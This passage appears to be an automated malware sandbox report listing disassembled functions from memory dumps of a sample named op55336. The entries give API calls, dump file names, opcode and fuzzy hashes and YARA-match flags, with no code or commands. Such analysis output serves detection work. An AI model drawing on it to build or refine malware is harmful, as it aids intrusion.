                                                                                              • Instruction Fuzzy Hash: DBE08C723402187BC620EA5ADC42F9BB7ADDFC5B14F01405AFA08A7281D6B0B9108BF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041538D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62threadwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 'oN$13d6pS3$13d6pS3
                                                                                              • API String ID: 1836367815-4202519509
                                                                                              • Opcode ID: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                              • Instruction ID: fe34e254e3c78a2d2e75bf211c42e0671cebaf8842b7d31fa9d3e155b3f4b5cb
                                                                                              • Opcode Fuzzy Hash: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                              • Instruction Fuzzy Hash: E4012BB1E0011CBADB11BAE19C81DEFBB7CDF81398F408029FA14B7140E6785F058BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00415393 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 13d6pS3$13d6pS3
                                                                                              • API String ID: 1836367815-3378015834
                                                                                              • Opcode ID: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                              • Instruction ID: 3a74e114496ce0711f9fc21398a0d08397c93f4088640f40c2c0ae561a51f52a
                                                                                              • Opcode Fuzzy Hash: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                              • Instruction Fuzzy Hash: 45012BB1E0011CBADB01BAE19C81DEF7B7CDF81398F408029FA1477140D6785F058BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042C1F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,0041F3AB,?,?,00000000,?,0041F3AB,?,?,?), ref: 0042C22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                              • Instruction ID: d3d283629ae7dbb578c3361da26e2255cf3ead57a8e0f8df25f3f891fe741430
                                                                                              • Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                              • Instruction Fuzzy Hash: 48E09AB1300204BFDA10EE99EC41E9B77ADEFC9710F00001AFD08A7282CA70BD108BB9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042C243 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC5D89F8,00000007,00000000,00000004,00000000,004185EF,000000F0,?,?,?,?,?), ref: 0042C27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                              • Instruction ID: c9dcfcbd2332931f1569d3fe54102bcbb547f49f7c4da694ae441fffeaf01cfd
                                                                                              • Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                              • Instruction Fuzzy Hash: 40E092753442047BC610EE5ADC42F9B73ADEFC5710F000419FD08A7241C670B9208BB8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042C293 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExitProcess.KERNELBASE(?,00000000,?,?,39D1C69F,?,?,39D1C69F), ref: 0042C2CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                              • Instruction ID: 632e54142e25fb71edcd38b63f987ef404ae7833aca244d52deb45822a5d22ed
                                                                                              • Opcode Fuzzy Hash: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                              • Instruction Fuzzy Hash: 5CE04F752402147BC520EA5ADC41F9B775DDFC5714F004019FA0867142CAB479158BE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00E90080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [Pj
                                                                                              • API String ID: 0-2289356113
                                                                                              • Opcode ID: 27ae018e16d23a04be0202338ce038b366df44a43126288a574badd82aab0704
                                                                                              • Instruction ID: 82301c17b6ea649db4769ffc93e25afe3e0c224eaa9e840b40d9d5674297b156
                                                                                              • Opcode Fuzzy Hash: 27ae018e16d23a04be0202338ce038b366df44a43126288a574badd82aab0704
                                                                                              • Instruction Fuzzy Hash: 03F062312043447FDB21AA20CC85F2A7BA9AF85754F549818F8457A093C7669821E721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EB26F8 Relevance: .0, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                              • Instruction ID: 131fa78438af128fd36248492ca9ca352e69f27065d87bfc86952a91b20433e8
                                                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                              • Instruction Fuzzy Hash: 27F022203240699BDB09EB588C916FB33D5EF94705F54E03EEF49DB206DA31ED008294
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EF0101 Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                              • Instruction ID: dbddd362877c6671cc3641b304bd84ba20b794e95208ef3555b7f793943c1270
                                                                                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                              • Instruction Fuzzy Hash: 25F082722422089FCB1CCF04C490BB937B2EB80719F24902CE60B9F692D7359841C654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E900EA Relevance: .0, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8389ecf7bf10a3e03b98e9d3af6fa41188b1c759e70089258c32008f4304a9bb
                                                                                              • Instruction ID: 0e9385d2981d0e5b9af5b098776e17c15b356d5d008710ac7b070b6336abcb90
                                                                                              • Opcode Fuzzy Hash: 8389ecf7bf10a3e03b98e9d3af6fa41188b1c759e70089258c32008f4304a9bb
                                                                                              • Instruction Fuzzy Hash: 70E01A71545B81CFD321DF15D901B5AB3F4FF88B10F15483AF805A7751D7789A05C952
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA00C4 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA0060 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA0078 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA0048 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
